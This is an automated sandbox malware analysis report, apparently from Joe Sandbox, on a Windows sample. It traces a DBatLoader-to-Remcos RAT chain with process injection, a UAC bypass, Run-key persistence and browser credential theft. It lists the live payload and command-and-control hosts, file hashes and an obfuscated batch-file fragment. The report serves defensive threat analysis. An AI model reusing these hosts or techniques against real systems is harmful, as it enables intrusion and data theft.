  DNS/IP: apostlejob2.duckdns.org; maan2u.com; geoplugin.net
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
  Signature on apostlejob2.duckdns.org: Uses dynamic DNS services
  Started: XjPA2pnUhC.exe (node 8); Qzzgbhha.PIF (node 13)

XjPA2pnUhC.exe (node 8; created registry values / files: 1 / 6)
  DNS/IP: maan2u.com 112.137.173.77, 443, 49704, 49705, TMVADS-APTM-VADSDCHostingMY, Malaysia
  Dropped: C:\Users\Public\Qzzgbhha.url (MS); C:\Users\Public\Libraries\Qzzgbhha (data)
  Signatures: Early bird code injection technique detected; Allocates memory in foreign processes; Queues an APC in another process (thread injection); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  Started: colorcpl.exe (node 15); cmd.exe (node 20); Qzzgbhha.PIF (node 22); esentutl.exe (node 24)

Qzzgbhha.PIF (node 13)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: SndVol.exe (node 26)

colorcpl.exe (node 15; created registry values / files: 3 / 16)
  DNS/IP: apostlejob2.duckdns.org 192.161.184.44, 2468, 49706, ASN-QUADRANET-GLOBALUS, United States; geoplugin.net 178.237.33.50, 49707, 80, ATOM86-ASATOM86NL, Netherlands
  Dropped: C:\ProgramData\remcos\logs.dat (data)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 2 other signatures

cmd.exe (node 20; created registry values: 1)
  Started: esentutl.exe (node 28); conhost.exe (node 32)

Qzzgbhha.PIF (node 22)
  Signatures: Early bird code injection technique detected; Allocates memory in foreign processes
  Started: SndVol.exe (node 34)

esentutl.exe (node 24; created registry values: 2)
  Dropped: C:\Users\Public\Libraries\Qzzgbhha.PIF (PE32)
  Started: conhost.exe (node 36)

SndVol.exe (node 26)
  Signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to steal Firefox passwords or cookies; Delayed program exit found

esentutl.exe (node 28; created registry values: 2)
  Dropped: C:\Users\Public\alpha.pif (PE32)
  Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)

SndVol.exe (node 34)
  Signatures: Detected Remcos RAT

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner
XjPA2pnUhC.exe | 32% | ReversingLabs
XjPA2pnUhC.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner
C:\Users\Public\Libraries\Qzzgbhha.PIF | 100% | Joe Sandbox ML
C:\Users\Public\Libraries\Qzzgbhha.PIF | 32% | ReversingLabs
C:\Users\Public\alpha.pif | 0% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpJ | 0% | Avira URL Cloud | safe
apostlejob2.duckdns.org | 100% | Avira URL Cloud | malware
http://geoplugin.net/json.gp( | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpl# | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpW | 0% | Avira URL Cloud | safe
http://www.pmail.com | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe
https://maan2u.com/ | 0% | Avira URL Cloud | safe
https://maan2u.com/doc/233_Qzzgbhhaaml | 0% | Avira URL Cloud | safe
https://maan2u.com:443/doc/233_Qzzgbhhaaml | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
apostlejob2.duckdns.org | 192.161.184.44 | true | true | (none) | unknown
geoplugin.net | 178.237.33.50 | true | false | (none) | unknown
maan2u.com | 112.137.173.77 | true | true | (none) | unknown

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
apostlejob2.duckdns.org | true | Avira URL Cloud: malware | unknown
https://maan2u.com/doc/233_Qzzgbhhaaml | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp( | colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl# | colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gp/C | XjPA2pnUhC.exe, 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpJ | colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpW | colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://maan2u.com:443/doc/233_Qzzgbhhaaml | XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://maan2u.com/ | XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000623000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.pmail.com | XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpSystem32 | colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0C | XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
112.137.173.77 | maan2u.com | Malaysia | 17971 | TMVADS-APTM-VADSDCHostingMY | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.161.184.44 | apostlejob2.duckdns.org | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1517948
Start date and time: 2024-09-25 09:33:43 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XjPA2pnUhC.exe
renamed because original name is a hash value
Original Sample Name: bbf710c83246092a538128620853d4fd.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@18/10@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 86
• Number of non-executed functions: 215
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: XjPA2pnUhC.exe
Time | Type | Description
03:34:33 | API Interceptor | 2x Sleep call for process: XjPA2pnUhC.exe modified
03:34:51 | API Interceptor | 2x Sleep call for process: Qzzgbhha.PIF modified
03:35:13 | API Interceptor | 6841924x Sleep call for process: colorcpl.exe modified
09:34:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
09:34:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
112.137.173.77 | Payment Slip.xls | malicious | DBatLoader, Remcos | -
112.137.173.77 | EORJy4JxW2.rtf | malicious | DBatLoader, Remcos | -
112.137.173.77 | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | -
178.237.33.50 | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | TT4729920DBO.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SPEC.xls | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | UsoOuMVYCv8QrxG.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe | malicious | Remcos | geoplugin.net/json.gp
192.161.184.44 | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | -
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
maan2u.com | Payment Slip.xls | malicious | DBatLoader, Remcos | 112.137.173.77
maan2u.com | EORJy4JxW2.rtf | malicious | DBatLoader, Remcos | 112.137.173.77
maan2u.com | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | 112.137.173.77
apostlejob2.duckdns.org | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | 192.161.184.44
apostlejob2.duckdns.org | 1715671566ff29b1c279c8e66099d383a7e1b960729a091c6d4225ded86182badee2c75ba9889.dat-decoded.exe | malicious | AveMaria, UACMe | 107.175.212.20
geoplugin.net | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 178.237.33.50
geoplugin.net | TT4729920DBO.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | SPEC.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | UsoOuMVYCv8QrxG.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe | malicious | Remcos | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
ASN-QUADRANET-GLOBALUS | BANK PAYMENT COPY.doc | malicious | XWorm | 66.63.187.123
ASN-QUADRANET-GLOBALUS | https://2836500.vip/ | malicious | Unknown | 27.0.235.55
ASN-QUADRANET-GLOBALUS | #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exe | malicious | Unknown | 45.95.233.246
ASN-QUADRANET-GLOBALUS | #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exe | malicious | Unknown | 45.95.233.246
ASN-QUADRANET-GLOBALUS | #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exe | malicious | Unknown | 45.95.233.246
ASN-QUADRANET-GLOBALUS | Drawing_Products_Materials_and_Samples_IMG.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 64.188.18.75
ASN-QUADRANET-GLOBALUS | 11062370MXQRQ353000718_001.doc | malicious | Unknown | 66.63.187.123
ASN-QUADRANET-GLOBALUS | http://closingdocuments.z13.web.core.windows.net/ | malicious | HTMLPhisher | 104.194.214.213
ASN-QUADRANET-GLOBALUS | swift.doc | malicious | Nanocore | 66.63.187.123
ASN-QUADRANET-GLOBALUS | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | 192.161.184.44
ATOM86-ASATOM86NL | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | TT4729920DBO.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SPEC.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | UsoOuMVYCv8QrxG.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe | malicious | Remcos | 178.237.33.50
TMVADS-APTM-VADSDCHostingMY | Payment Slip.xls | malicious | DBatLoader, Remcos | 112.137.173.77
TMVADS-APTM-VADSDCHostingMY | EORJy4JxW2.rtf | malicious | DBatLoader, Remcos | 112.137.173.77
TMVADS-APTM-VADSDCHostingMY | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader | 112.137.173.77
TMVADS-APTM-VADSDCHostingMY | arm6.elf | malicious | Unknown | 202.75.62.110
TMVADS-APTM-VADSDCHostingMY | SecuriteInfo.com.Trojan.AutoIt.1161.27360.18045.exe | malicious | VIP Keylogger | 202.75.41.110
TMVADS-APTM-VADSDCHostingMY | M2Vf6ASl3g.elf | malicious | Unknown | 202.75.62.171
TMVADS-APTM-VADSDCHostingMY | fhSHwOyb33.elf | malicious | Gafgyt, Mirai | 202.75.62.139
TMVADS-APTM-VADSDCHostingMY | sora.arm7.elf | malicious | Mirai | 202.75.62.119
TMVADS-APTM-VADSDCHostingMY | lB9ZXOQaP3.elf | malicious | Mirai | 202.75.62.116
TMVADS-APTM-VADSDCHostingMY | ngbwBT18rP.elf | malicious | Mirai | 202.75.62.121
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | ACeTKO93e9.exe | malicious | LummaC | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | LNGHLELNes.exe | malicious | LummaC | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | NEW ORDER.xls | malicious | Unknown | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | Document.xls | malicious | Unknown | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | L24027490-Modello incendio e altri rami [NEW](Elaborato finale)-23092024.xls | malicious | Unknown | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | YPDi0gRMHU.exe | malicious | SmokeLoader | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | CNpQfI8eIT.exe | malicious | SmokeLoader | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | 4EtLXn5pqI.exe | malicious | SmokeLoader | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | RWcyVDbMGQ.exe | malicious | SmokeLoader | 112.137.173.77
a0e9f5d64349fb13191bc781f81f42e1 | http://juno-online7373h.wixsite.com/my-site/ | malicious | Unknown | 112.137.173.77
Match (Dropped file) | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Libraries\Qzzgbhha.PIF | Payment Slip.xls | malicious | DBatLoader, Remcos
C:\Users\Public\alpha.pif | ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
C:\Users\Public\alpha.pif | ZPujMIT7Vs.exe | malicious | Remcos, DBatLoader
C:\Users\Public\alpha.pif | ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd | malicious | AgentTesla, DBatLoader
C:\Users\Public\alpha.pif | Contact Form and Delivery Details ,pdf.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.pif | Duclot Collections.bat | malicious | Remcos, DBatLoader
C:\Users\Public\alpha.pif | GestionPagoAProveedores_100920241725998901306_PDF.cmd | malicious | Remcos, DBatLoader, FormBook
C:\Users\Public\alpha.pif | 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd | malicious | Remcos, DBatLoader, FormBook
C:\Users\Public\alpha.pif | Julcbozqsvtzlo.cmd | malicious | Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe
C:\Users\Public\alpha.pif | Confirmation.docx.exe | malicious | DBatLoader, Lokibot
C:\Users\Public\alpha.pif | IEry29c3sb.exe | malicious | Remcos, DBatLoader
                                                        Process:C:\Windows\SysWOW64\colorcpl.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288
                                                        Entropy (8bit):3.3169194756385068
                                                        Encrypted:false
                                                        SSDEEP:6:6l2855YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lfec0WFe5BWFe5BW+
                                                        MD5:D8D18E38339CE67F1E76B9D7BE7587C9
                                                        SHA1:8298AF9BCF75AE2BC785845DE1EB7D2C9587B019
                                                        SHA-256:CA9401BD555D9C499934B414B7DDBBDD28A2AC94937B95749688E7EA940AA9DE
                                                        SHA-512:72547AD9788A60C201DD3B931301074D8501D96C0A92C12E983770055B41CC14B12BB033F5CE4F6C74F22D0F09B5941189C911CADC4413CA7146D7AA8B1786F4
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                        Preview:....[.2.0.2.4./.0.9./.2.5. .0.3.:.3.4.:.4.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):2.0
                                                        Encrypted:false
                                                        SSDEEP:3:gov:gov
                                                        MD5:D17B8377F66273771CD3B5165F393561
                                                        SHA1:4218581488233698A293E3BF395DEA242601910A
                                                        SHA-256:BAD8A8C24E18664287F4F20CB8DE2B089525D51F939C537B471F2D273FB66F3F
                                                        SHA-512:38C9C49E34D4057CC084BABB9791E603F81AB0CB64E1973896C3615CD18B09B26E2375EE273B7D7180DE98A9369F71A63783E55CC1C854BF7B08939E82DE85DB
                                                        Malicious:false
                                                        Preview:76..
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):838459
                                                        Entropy (8bit):7.206470842924749
                                                        Encrypted:false
                                                        SSDEEP:12288:cd6lycsEh2/Qd72Q9q7UKotuTJ/4hppo5lc06HxNnrpEGOFz9cWVAfGWYHW8:k6lycs4Nd7Azo41uppOOhIFBe+Z
                                                        MD5:E9303B0472758478C2F6287D39F73614
                                                        SHA1:FAD32F4636A60969F0C9C3B1CA8D1A0AB5C9D37D
                                                        SHA-256:4224050F7B373F1F8D35D736741DCE705F12058F2BCDDA8FAB9D95969D3722FF
                                                        SHA-512:3237492F2A486E0E2CCE18DBAAA16798039C967C34AB60162A37F010E96588EFF58549361AACD08FB80FF13DC8DF8212AA45C89A012B69349F23CF5CC0CBD5FD
                                                        Malicious:true
                                                        Preview:...Y#..K#%'...#....."'.......!............ !'....% .........%... $$.%.'..'.'%$..&&....Y#..K.''...........Y#..K..........}..7:0..v..........7G...0..<..A.....'..`L.:.......N.....{*...5I>....KI.:.L={.79..V7...q..%X....*..0.6.d5e...z&.....lX.js..7./..8.,...........@.*O... Zw......512..7......z+...U,1.m..X.. X.0B--E5..rH........].......%B6...#..y..K...Sf.....3.......Q..W.W..rL......)O..4...=.........R9.......#)N5..DF........L73E...5.O2y.8^.nX.N.v...".lm..........mP..._~..`R,.C.........K....2...R..{Q.W.z....O:>.54....Q...Z...X..V9B...5.2s...1...WF4.N....2...XJ...QJ.R...S.8.O.BH.....<:14....Y.....uGd.....H.r......._....L....(E...;...=.UF.46....5.?.z.?W E..'.....9....O=33..+.....1BCH....Y|.R..U.b#w.k..P.v+.S..V..I..........O...........O'..........'.../....2:..CU/.-.1..a.h.4.<.H..v.........M.M..../7.. ...p-.H../....q...j..."k...Wd.5.>5..*.=.&`i.........cJ..........%....N(..1...O.n....K..............U..,.....!....3..N.o......1.........H....
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1088512
                                                        Entropy (8bit):6.864877848429584
                                                        Encrypted:false
                                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                                        MD5:BBF710C83246092A538128620853D4FD
                                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:
• Filename: Payment Slip.xls, Detection: malicious
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................2...f......$H.......P....@..........................0...................@...............................(...p..........................Pl......................................................H............................text....'.......(.................. ..`.itext..l....@.......,.............. ..`.data........P.......6..............@....bss.....6...p.......J...................idata...(.......*...J..............@....tls....4............t...................rdata...............t..............@..@.reloc..Pl.......n...v..............@..B.rsrc........p......................@..@.............0......................@..@................................................................................................
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):62357
                                                        Entropy (8bit):4.705712327109906
                                                        Encrypted:false
                                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                        Malicious:false
                                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF">), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.160488007387044
                                                        Encrypted:false
